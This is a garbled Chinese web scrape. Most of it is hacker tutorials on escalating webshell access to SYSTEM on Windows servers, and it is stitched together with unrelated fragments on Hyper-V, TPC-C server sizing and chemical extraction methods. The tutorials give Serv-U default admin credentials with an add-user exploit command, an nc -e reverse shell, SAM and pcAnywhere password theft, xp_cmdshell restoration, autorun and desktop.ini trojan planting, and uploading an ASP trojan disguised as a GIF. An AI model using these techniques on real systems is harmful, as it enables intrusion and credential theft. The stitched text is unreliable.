对服务器进行提权的方法
文章录入:责任编辑: 84
【字体:小大】
现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋友的不断回复中能够丰富我们的方法。
首先要说明的是,过早的一些漏洞我们就不再多说了,只说一些现在可以见到的吧。还有就是本文的题目是webshell下的服务器提权方法。
下面我们就进入主题,对webshell的提权方法!
首先我们要明确的是,提权一般是依靠主机所开通的服务,利用服务存在的漏洞和管理员设置的疏忽进行提权的,不过也不排除一些SB的管理员对服务器设置的似乎没有"穿衣服".下面就是针对一些常见的服务进行的提权方法。
在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起:
的提权方法
pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere 密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。
提权方法
Serv-u可以说是网络上比较火的一款FTP服务器软件,有许多像我这样的小黑们都是看系统服务中是否有Serv-u的系统进程来进行提权的。Serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧!
本地提权:serv-U本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如Xiaolu写的就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u 进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录:
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\Documents\
很多时候data目录不行,试试这个很多主机都是erveryone 完全控制!
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服务器支持PHP)
c:\PHP(如果服务器支持PHP)
上面一些目录就是常见的,不过也不排除一些特殊的,像江民的kv2004对文件夹的权限设置就不是很严格的。
不过针对本地提权是可以防范的,下面是我在xiaolu的文章中节选的:
防止办法和对策:
一般防止方法:设置目录权限,通过去掉Web目录iusr用户的执行权限来防止使用Webshell来运行Exp程序。
对策:这种方法有一定的局限性,需要设置的目录很多,不能有一点疏漏,比如我就发现很多虚拟主机在C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并运行Exp,这种目录还有x:\php,x:\perl等,因为这种目录都是everyone完全控制的。有些主机还支持php,pl,aspx 等,这简直就是服务器的Serv-U灾难,^_^,运行程序更加方便。
高级一点的防止办法:修改Serv-u管理端口,用Ultraedit打开查找B6AB(43958的16进制),替换成自己定义的端口比如
3930(12345),打开找到最后一个B6AB替换成3930(12345),启动Serv-u,现在本地管理端口就成了12345了:
TCP LISTENING
对策:对付这种也很简单,netstat –an,就能看到端口了,有人说netstat无法运行,其实你再上传个到可执行目录运行就ok了,然后修改一下Exp编译,上传运行就好了,我修改了一个可以自定义端口的Exp,运行格式:
USAGE: port "command"
Example: 43958 "net user xl xiaoxue /add"
更高级的防止办法:修改管理员名和密码,用Ultraedit打开查找Ascii:LocalAdministrator,和#l@$ak#.lk;0@P,修改成等长度的其它字符就可以了,也一样处理。
对策:这下默认的管理员连接不上了,还有办法么嘿嘿,有的管理员安装Serv-u都是使用默认目录C:\Program Files\Serv-U安装,这个目录虽然不能写,也不能修改,但是默认iusr是可以读的,我们可以用webshell来下载,用Ultraedit打开分析一下,Serv-U 的帐号密码就到手了,修改Exp编译上传运行,我们又胜利了。
终极防御:
a.设置好目录权限,不要疏忽大意;
最好不要使用默认安装路径,设置Serv-U目录的权限,只有管理员才能访问;
c.用我介绍的办法修改Serv-U的默认管理员名字和密码,喜欢的话端口也可以改掉。
管理端口定向转发法:这里需要使用的工具是
我们要知道Serv-u默认本地管理端口是:43958,这个是只允许本地进行登陆和管理的,那么我们就想能不能通过端口转向来远程管理呢所以我们用到,首先是将上传至服务器中,然后再cmd下执行
-v -l 12345-r 43958 这里要说明的是,这段字符的意思是当访问12345端口时就会自动转向43958端口,也就是serv-u的管理端口
所以我们在本地安装一个Serv-u,
新建一个服务器,填入对方IP,
user:
LocalAdministrator
pass:
#l@$ak#.lk;0@P
连接上后你就可以管理他的Serv-u了,剩下的操作就是执行上面提到的方法了!
===================================================
Serv-U的方法我就总结出这几个来,可能还有其他的方法我没有看到吧
不过个人认为关键还是本地溢出漏洞的应用要比较多一些,所以网上也常常出现serv-u的本机溢出程序
不同版本的更是层出不穷,前一段时间针对的修改了默认管理员账号和密码的相关文章还请大家参照校园黑客联盟的小鱼修炼中的文章。
Serv-U的提权文章就暂时先总结到这里,有更好的方法还请大家回复!
方法:这种方法也可以说是比较古老的方法,最初应该是从光盘自动播放中寻找到的灵感吧不进行细说,给出格式即可
制作一个文件.内容如下
[AutoRun]
open=
为木马程序,与放在同一目录下
破解方法:进入C:\WINNT\system32\config\ 下载他的SAM文件用lc等破解工具破解。
5.相关脚本提权方法:前面的serv-u的ftp提权中提过的vbs这里再说下.进入c:\Documents and Settings\All Users\「开始」菜单\程序\启动写入bat或vbs文件。这种方法也是属于守株待兔类的,只有在对方主机重起以后才可以达到目的。
的反弹提权:这里就要说NC的相关用法了,如果在对方服务器中有足够的权限执行nc 的话就好了,把它反弹到自己的电脑上,你就可以进行相关操作了!瑞士军刀具体方法不多说,给出格式,如下:
server:nc -e ip 1234
client: nc -l -p 1234
等asp文件中泄漏SQL帐户密码方法:这种方法说起来应该算是比较侥幸的方法。曾经马俊和我说过一次,原来没有太在意,现在还真的感觉有些好用了,找到账号密码和数据库名在对方没有删除xp_cmdshell条件下用sql连接工具连接即
,连接上后就可以输入你想要的CMD命令了。
的相关提权:VNC也是一个类似pcanywhere的远程管理软件,在linux应用广泛,曾经在看台湾的一些服务器中有很多使用VNC的,方法也是我在网络中学到的,不过在应用中就成功过一次,比较郁闷!方法就转载一下吧,网址:Article/HTML/
还有要补充的就是vnc是可以反向连接的,这个方法我没有试过,只是曾经看影子做过
一个视频动画。
与方法。(此方法是在网络看到的)方法如下:首先建立一个文件夹,进入,在空白处点右键,选择“自定义文件夹”一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder
setting的文件架与的文件,如果看不到,就把显示所有文件给选上,然后我们在Folder setting目录下找到文件,记事本打开,在任意地方加入以下代码: 然后你将你的木马文件放在Folder setting目录下,把此目录与一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的木马,此方法也属于类似autorun的守株待兔方法。
10.替换服务提权:我认为比较复杂,不过有些时候也实用,首先是看服务进程,在看我们是否有执行命令的权限,这里要用到的命令是rename,相关用法:
C:\>rename /
重命名文件。
RENAME [drive:][path]filename1 filename2.
REN [drive:][path]filename1 filename2.
例如替换c:\kv2004\的进程
rename c:\kv2004\
然后再将我们的本地木马文件命名为上传到c:\kv2004\目录下,等待对方重新起动机算机即可!
1.技术建议书 1.1.系统部署结构及软硬件配置 1.1.1.设备部署方案 常见的集团式部署方案有三种: 集中式部署:目录数据与原文均集中在总部服务器中; 分布式部署:目录数据与原文数据均分散在各个二级单位中存储, 统将全集团数据 再由一套分布式全文检索系提供统一门户、统一权限的检索; 混合式部署:目录数据集中存储在总部服务器中,电子文件存放在各个二级单位服务器中; XXXX根据本次项目需求与特点推举以纯B/S软件平台构成的集中式部署方案。 各种方案优点对比:
1.1. 2.硬件说明 1.121. Hyper-V 硬件需求 安装并使用Hyper-V 角色,需要满足以下条件 一个基于64位的处理器。Hyper-V 仅在64位Windows Server 2008 中可用 ----------------- 具体包括 64位的 Windows Server 2008 标准版、Windows Server 2008 企业版以及 Windows Server 2008 数据中心 版。Hyper-V 在32位(x86)版本的或基于安腾系统版本的 Windows Server 2008 不可用。虽然如 此,Hyper-V 管理工具仍然提供 32位版本。 硬件辅助虚拟化。这可用于包含了虚拟化选项的处理器一一具体来说,包括拥有In tel (Intel VT )或 AMD Virtualization (AMD-V 技术的处理器。 硬件强制数据执行保护 (DEP 必须可用并启动。具体来说,必须启用In tel XDbit ( execute disable bit )或 AMD NX bit (no execute bit )。 硬件辅助虚拟化以及硬件强制 DEP 在 BIOS 中设置。虽然如此,设定的名称可能与以上有所不同。 了解特定的处理器型号是否支持 Hyper-V ,请与计算机制造商进行联系。如果调整了硬件辅助虚拟 化和硬件强制 DEP 的设定,可能需要断开计算机电源,并重新开机。简单的重新启动可能无法使设 置生效。 1.1. 2.1.1. 内存 可以使用的最大内存数量由操作系统来决定。具体如下: 对于 Windows Server 2008 企业版和 Windows Server 2008 数据中心版来说,物理计算机可以配 置最多1 TB 物理内存,运行这些版本操作系统的虚拟机可以为每台虚拟机分配 Server 2008标准版来说,物理计算机可以配置最多 32 GB 物理内存,运行这些版本做系统的虚拟机可 以为每台虚拟机分配 31 GB 内存。 Virtualizati on Tech no logy 64 GB 内存。对于 Windows
WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere 密码,登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM,破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP) c:\PHP(如果服务器支持PHP) 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升,好象不是很理想的 如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini,还有你的木马或者是VBS或者是什么,放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法! 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功,但是我是的确看见别人成功过
综述中药提取方法 摘要以中药提取方法的本质与影响提取作业的因素为理据,分析国内中药厂提取方法 关键词中药提取方法 1前沿 近年来有关中药提取方法的论述有很多,然而有效成分的提取率仍然就是现今国内中药制药工业现代化的瓶颈。尽管近年来国内在中药提取生产中推出了一些新工艺,如超声场强化提取、微波提取、超临界流体提取等,但当下的主流仍就是浸提技术。浸提技术就是应用溶剂提取固体原料中某一或某类成分的提取分离操作,又称固液萃取。目前在中药生产过程中,常用的中药浸提方法有煎煮法、浸渍法、渗漉法、回流法、水蒸气蒸馏法等。 面对众多中药提取方法如何抉择就是一个复杂的问题,因为它牵涉到生产设备与生产条件等许多因素。加上如今中药提取的规模较大,尤其考虑到连续生产,即使在实验中取得成果,在实际情况下还要经过长时间的实践检验。还有前面提到过的提取新工艺,其提取物往往就是化学结构明确的物质,与传统中药生产完全就是两回事,所以生产传统中药的厂家下不了决心去尝试新工艺,生产者情愿随大流,以避免风险。 提取方法的不同,提取等量有效成分所需原料与能源也
不尽相同,资源与能源对世界经济与人类生存环境的影响越来越被重视。可持续发展经济与资源节约型社会的概念已经被全世界广泛认同,中国也不例外。在市场竞争激烈异常的今天,生产成本的控制就就是企业的生命,而对世界能源价格上涨的现实,生产者应该节约每一滴水,每一度电。中药生产厂家必须努力挑选出最好的中药提取方法,改变目前中药提取效率低、高能耗、高污染所造成的负面影响。 2选择原则 与所有的工程项目一样,选择中药提取方法必要考虑的条件也就是:被处理物料的性质、数量,产品的价值操作人员的技术水平,现实的设备安装场地,生产成本的控制,投资的预算。所追求的目标也就是最高的投资回报率,最低的能耗,最简单的操作,最理想的提取率。降低生产成本,提高产品质量,从而提升本企业的市场竞争力。舍此不会有 良好的后果。 3中药提取本质 中药提取本质上就是一种固液萃取作业,任何化工原理教科书与化工手册对固液萃取的机理都有详尽的阐明。为了便于分析国内中药厂现有提取装置的状况,有必要将其与中药提取有关的结论摘录于此。
基于T P C C的服务器性 能计算方法 The document was prepared on January 2, 2021
开发技术文档之 数据库服务器性能计算需求分析版本历史
一、数据库服务器性能计算需求分析 考虑到***公安局超级情报系统(SIS)设备升级项目的数据库服务器的性能,我们建议采用主流的TPC-C 值进行性能估算。 TPC-C 是一种旨在衡量联机事务处理(OLTP)系统性能与可伸缩性的行业 标准基准测试项目。这种基准测试项目将对包括查询、更新及队列式小批量事 务在内的广泛数据库功能进行测试。对于数据库密集型应用来说,TPC-C 被许多 IT 部门视为衡量真实OLTP 系统性能的有效指示器。 ***市公安局超级情报系统(SIS)设备升级项目未来的并发客户约为 5000,绝大多数应用属于联机事务处理(OLTP)性质。我们建议对数据库服务 器的性能进行如下测算: 为了方便计算数据库服务器的性能,我们约定: 1) 系统同时在线用户数为5000 人(U1); 2) 平均每个用户每分钟发出2 次业务请求(N1); 3) 系统发出的业务请求中,更新、查询、其它各占1/3; 4) 平均每次更新业务产生4 个事务(T1); 5) 平均每次查询业务产生4 个事务(T2); 6) 平均每次其它业务产生8 个事务(T3); 7) 一天内忙时的处理量为平均值的8 倍; 8) 经验系数为;(实际工程经验) 1
9) 考虑服务器保留50%的冗余; 服务器需要的处理能力为:TPC-C=U1*N1*(T1+T2+T3)/3*8*经验系数/冗余系数则服务器的处理性能估算为:TPC-C= 5000*2*(4+4+8)/3*8*= 1,365,333tpmC 情报系统数据库服务器关系到整个系统的稳定运行,考虑到高可靠性和高可用性,并注重设备的可扩展性和性价比,同时考虑满足5 年内业务系统的服 务能力,建议数据库服务器配置一台TPC-C 值不小 于150 万的高性能小型机服务器,用做该情报系统的核心数据库服务器。 本次我们建议新购1 台小型机,配置16 个CPU 及64GB 内存,用于该超级情报系统系统的核心数据库服务器。 系统建设方案业务用户行 为分析模型
前段时间我朋友给我一个sopo的软件,说是扫1433口令的,而且猜解速度很快,我就找个服务器试了试,确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。(有人可能会说了,这有啥好研究的,sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧) 下面来说sa下执行命令错误的几种情况: 1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。) 这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。 第一步 exec sp_dropextendedproc 'xp_cmdshell' (这个命令就是删除原有的cmdshell,因为已经出错了) 第二步 dbcc addextendedproc (“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”) ;EXEC sp_configure 'show advanced options', 0 – 当然这是sql命令,用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径,这个路径是比较常见的,如果c盘没有可以找找其他盘符。 2、无法在库xpweb70.dll 中找到函数xp_cmdshell。原因:127(找不到指定的程序。) 其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。 3、未能找到存储过程‘masterxpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc
1433端口提权的过程 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/a812542022.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上
传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西
详解黑客入侵Web服务器的常用八种方式 发布时间:2012-6-13 14:21:37 被阅览数:次来源:厦门凌众科技有限公司onclick=tagshow(event) href="tag.php?name=%B7%FE%CE%F1%C6%F7">服务器一般都很容易成为黑客们的入侵对象,本文向广大的onclick=tagshow(event) href="tag.php?name=%CD%F8%B9%DC">网管员们介绍了黑客们常用 的八种入侵onclick=tagshow(event) href="tag.php?name=%B9%A5%BB%F7">攻击方式,供大家参考! 一、WEBonclick=tagshow(event) href="tag.php?name=%B7%FE%CE%F1">服务器面临威胁 在了解WEB服务器的安全状况之前,首先要让大家了解网站安全的另一面——黑客攻击。97至98年互联网开始在onclick=tagshow(event) href="tag.php?name=%D6%D0%B9%FA">中国兴起之时,黑客就已经诞生了,在98年印尼排华事件中,中国黑客对印尼ZF网站的打击行动通过媒体的渲染,让黑客一词进入了广大中国网民的眼帘。随着几次黑客大战的爆发以及媒体对黑客的渲染,让更多人加入了黑客这个队伍。那么黑客都是通过怎样的onclick=tagshow(event) href="tag.php?name=%BC%BC%CA%F5">技术手段实施攻击的呢?97年到2002年以来,除了比较有名的UNICODE漏洞之外,黑客们大部分都是利用onclick=tagshow(event) href="tag.php?name=%CF%B5%CD%B3">系统的各种溢出漏洞来实施 入侵,包括像ipc共享空连接漏洞,ida/idq,printer漏洞,rpc漏洞等等。2003年,中国互联网开始从01年的互联网寒冬逐渐走向复苏,盛大、分众传媒、空中网等一系列ITonclick=tagshow(event) href="tag.php?name=%C6%F3%D2%B5">企业分别在纳斯达克上市成功更进一步激起了更多IT从业人员开始开设网站和成立IT公司,梦想有一日能上纳斯达克拿onclick=tagshow(event) href="tag.php?name=%C3%C0%B9%FA">美国股民的钱。网站数量的激增以及大家对onclick=tagshow(event) href="tag.php?name=%CD%F8%C2%E7">网络安全的轻视,导致通过WEB的各种漏洞来进行入侵的事件越来越多。SQL注入漏洞随着黑客onclick=tagshow(event) href="tag.php?name=%B8%DF%CA%D6">高手 们一次又一次地使用在拿国内外onclick=tagshow(event) href="tag.php?name=%D3%CE%CF%B7">游戏onclick=tagshow(event)
授渔之<一次1433端口提权的过程> 随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=(https://www.doczj.com/doc/a812542022.html,)广告完毕。 把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录 显示错误信息: Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了, 当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权, 但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上
传无法成功,这条路走不通了, 这时就考虑用到工具的文件管理功能了 看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西
1.一技术建议书 1.1.系统部署结构及软硬件配置 1.1.1.设备部署方案 常见的集团式部署方案有三种: ●集中式部署:目录数据与原文均集中在总部服务器中; ●分布式部署:目录数据与原文数据均分散在各个二级单位中存储,再由一套分布式全文检索系 统将全集团数据提供统一门户、统一权限的检索; ●混合式部署:目录数据集中存储在总部服务器中,电子文件存放在各个二级单位服务器中; XXXX根据本次项目需求与特点推举以纯B/S软件平台构成的集中式部署方案。 各种方案优点对比:
1.1. 2.硬件说明 1.1. 2.1. Hyper-V硬件需求 安装并使用Hyper-V角色,需要满足以下条件: ●一个基于64位的处理器。Hyper-V仅在64位Windows Server 2008中可用——具体包括64位的 Windows Server 2008标准版、Windows Server 2008企业版以及Windows Server 2008数据中心版。 Hyper-V在32位(x86)版本的或基于安腾系统版本的Windows Server 2008不可用。虽然如此,Hyper-V 管理工具仍然提供32位版本。 ●硬件辅助虚拟化。这可用于包含了虚拟化选项的处理器——具体来说,包括拥有Intel Virtualization Technology(Intel VT)或AMD Virtualization(AMD-V)技术的处理器。 ●硬件强制数据执行保护(DEP)必须可用并启动。具体来说,必须启用Intel XD bit(execute disable bit) 或AMD NX bit(no execute bit)。 ●硬件辅助虚拟化以及硬件强制DEP在BIOS中设置。虽然如此,设定的名称可能与以上有所不同。 了解特定的处理器型号是否支持Hyper-V,请与计算机制造商进行联系。如果调整了硬件辅助虚拟化和硬件强制DEP的设定,可能需要断开计算机电源,并重新开机。简单的重新启动可能无法使设置生效。 1.1. 2.1.1.内存 可以使用的最大内存数量由操作系统来决定。具体如下: 对于Windows Server 2008企业版和Windows Server 2008数据中心版来说,物理计算机可以配置最多1 TB物理内存,运行这些版本操作系统的虚拟机可以为每台虚拟机分配64 GB内存。对于Windows Server 2008标准版来说,物理计算机可以配置最多32 GB物理内存,运行这些版本做系统的虚拟机可以为每台虚拟机分配31 GB内存。
服务器性能测试指标介绍 当前业界常见的服务器性能指标有: TPC-C TPC-E TPC-H SPECjbb2005 SPECjEnterprise2010 SPECint2006 及SPECint_rate_2006 SPECfp2006 及SPECfp_rate_2006 SAP SD 2-Tier LINPACK RPE2 一、TPC (Transaction Processing Performance Council) 即联机交易处理性能协会, 成立于1988年的非盈利组织,各主要软硬件供应商均参与,成立目标: 为业界提供可信的数据库及交易处理基准测试结果,当前发布主要基准测试为: TPC-C : 数据库在线查询(OLTP)交易性能 TPC-E : 数据库在线查询(OLTP)交易性能 TPC-H : 商业智能/ 数据仓库/ 在线分析(OLAP)交易性能 1.TPC-C测试内容:数据库事务处理测试, 模拟一个批发商的订单管理系统。实际衡量服务器及数据库软件处理在线查询交易处理(OLTP)的性能表现. 正规TPC-C 测试结果发
布必须提供tpmC值, 即每分钟完成多少笔TPC-C 数据库交易(TPC-C Transaction Per Minute), 同时要提供性价比$/tpmC。如果把TPC-C 测试结果写成为tpm, TPM, TPMC, TPCC 均不属正规。 2.TPC-E测试内容:数据库事务处理测试,模拟一个证券交易系统。与TPC-C一样,实际衡量服务器及数据库软件处理在线查询交易处理(OLTP)的性能表现。正规TPC-E测试结果必须提供tpsE值,即每秒钟完成多少笔TPC-E数据库交易(transaction per second),同时提供$/tpsE。测试结果写成其他形式均不属正规。 对比:TPC-E测试较TPC-C测试,在测试模型搭建上增加了应用服务器层,同时增加了数据库结构的复杂性,测试成本相对降低。截止目前,TPC-E的测试结果仅公布有50种左右,且测试环境均为PC服务器和windows操作系统,并无power服务器的测试结果。除此之外,TPC官方组织并未声明TPC-E取代TPC-C,所以,说TPC-E取代TPC-C并没有根据。 附TPC-C与TPC-E数据库结构对比 3.TPC-H测试内容:对大型数据仓库进行决策支持(decision support)的基准测试。TPC-H包含一组复杂的业务查询及修改操作,属于商业智能/数据仓库/在线分析(OLAP)
目录 1、进shell检查权限 (1) 2、扫端口 (1) 3、43958 开了 (2) 4、1433开了得到dbo权限 (2) 5、找到Serv-U目录无法访问 (3) 6、尝试mysql提权 (3) 7、尝试su提权 (4) 8、SU提权 (5) 9、总结 (5) 1、进shell检查权限 首先这个是看到坛子里面的一个求助提权贴提权的,以前在hake发过,但没这么详细 溜达进shell看了下子。。 aspx支持的完好,不过权限还是比较低的。。 IISSPY可以完美跨目录,那么提权还是有大大的希望的。。 2、扫端口 127.0.0.1 : 21 ................................. Open 127.0.0.1 : 25 ................................. Open 127.0.0.1 : 80 ................................. Open 127.0.0.1 : 110 ................................. Open 127.0.0.1 : 1433 ................................. Open 127.0.0.1 : 1723 ................................. Close 127.0.0.1 : 3306 ................................. Open 127.0.0.1 : 3389 ................................. Open 127.0.0.1 : 4899 ................................. Close 127.0.0.1 : 5631 ................................. Close 127.0.0.1 : 43958 ................................. Open 127.0.0.1 : 65500 ................................. Close
获得网站WEBSHELL权限 一、学习目标:在得到了管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到WEBSEHLL。 二、知识要点:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先试图获得管理员的帐号和密码,然后找出网站的后台(看管理员在后台的什么地方),对于现成的整站系统而言,通常后台是固定的,只要搞到网站就能以管理员的帐号进入。进了后台,就有了能力对网站进行操作,我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL,也就是一个脚本,这个脚本,具有可以管理WEB、修改主页内容的权限,如果要修改别人的主页,一般都需要这个权限(上传漏洞要得到的也是这个权限)。它可对网站的任何文件进行编辑,移动,复制,删除。如果某个服务器权限设置得不好,那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限,并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后,获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马,(之所以要把ASP的木马护展名由ASP改为GIF,是因为一般网站都有检测护展名,当检测到护展名为ASP时就不会允许上传),上传之后,用备份数据库的办法,把GIF护展名,备份成为ASP护展名,然后连接备份后的ASP地址,就能打开你上传的ASP木马,一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址,在恢复地址里输入你要生成的ASP地文件的路径和文件名,然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.doczj.com/doc/a812542022.html,/bbsxp1(之前已经通过某方法得到网站后台管理员的用户名、口令)。 (1)以管理员身份登录网站前台,如图1。 图1 (2)在图2界面中进入ACCESS数据库管理,并在图3界面中输入后台管理员密码完成登录。
改进的BCR重金属形态提取方法 试剂配制:所用的药品必须是分析纯以上。 溶液A 0.11mol/L冰乙酸(HOAc,0.11mol/L): 用移液枪吸取6.32 mL冰醋酸到1L的容量瓶中,再用去离子水定容。获得溶液A。(12.64 mL冰醋酸到2L的容量瓶中) 溶液B 0.5 mol/L盐酸羟胺(NH2OH·HCl,0.5 mol/L):溶解34.75g的NH2OH·HCl到400mL的去离子水中。转移溶液至1L容量瓶中,再加入25mL的2 mol/LHNO3(或3.125 mL浓HNO3)到1L容量瓶中,最后用去离子水定容。该溶液要当天使用当天配。(溶解69.49g NH2OH?HCl,加入6.25mL浓HNO3到2L的容量瓶中) 溶液C30%过氧化氢(H2O2,300mg/g,8.8 mol/L):使用由厂家提供的H2O2(用硝酸调节至pH稳定在2-3)即可。 溶液D 1 mol/L乙酸铵(NH4OAc,1 mol/L): 溶解77.08g的NH4OAc到800mL的去离子水中。再用一定浓度的HNO3调节pH到2.0±0.1,最后用去离子水定容。(154.16g-2L)注意事项: 1.所有用来盛放样品或反应物的容器及配置溶液的容量瓶和烧杯都 要用20% HNO3浸泡过夜,然后用去离子水清洗3遍以上。注意每批样品至少设置2个空白及两个标准品(BCR法)GBW07437进行质量控制。 2.第3步中每次添加完过氧化氢溶液或加热时,盖上盖子但不要拧 紧,前15min要格外小心,避免大量气体产生溢出损失样品。
